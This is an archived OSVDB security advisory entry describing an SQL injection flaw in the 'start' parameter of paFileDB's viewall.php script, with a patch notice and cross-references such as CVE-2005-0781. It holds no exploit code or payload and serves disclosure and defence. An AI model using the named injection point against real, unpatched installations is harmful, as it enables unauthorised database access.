paFileDB viewall.php start Parameter SQL Injection

2005-03-12T03:34:52
ID OSVDB:14839
Type osvdb
Reporter SecurityReason(sp3x@securityreason.com)
Modified 2005-03-12T03:34:52

Description

Vulnerability Description

paFileDB contains a flaw that may allow a remote attacker to inject arbitrary SQL queries. The issue is due to the 'start' parameter in the 'viewall.php' script not being properly sanitized and may allow a remote attacker to inject or manipulate SQL queries.

Solution Description

Currently, there are no known workarounds or upgrades to correct this issue. However, PHP Arena has released a patch to address this vulnerability.

Short Description

paFileDB contains a flaw that may allow a remote attacker to inject arbitrary SQL queries. The issue is due to the 'start' parameter in the 'viewall.php' script not being properly sanitized and may allow a remote attacker to inject or manipulate SQL queries.

References:

Vendor URL: http://www.phparena.net/pafiledb.php Security Tracker: 1013426 Related OSVDB ID: 14842 Related OSVDB ID: 14840 Related OSVDB ID: 14841 Nessus Plugin ID:17327 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-03/0198.html ISS X-Force ID: 19688 CVE-2005-0781 Bugtraq ID: 12788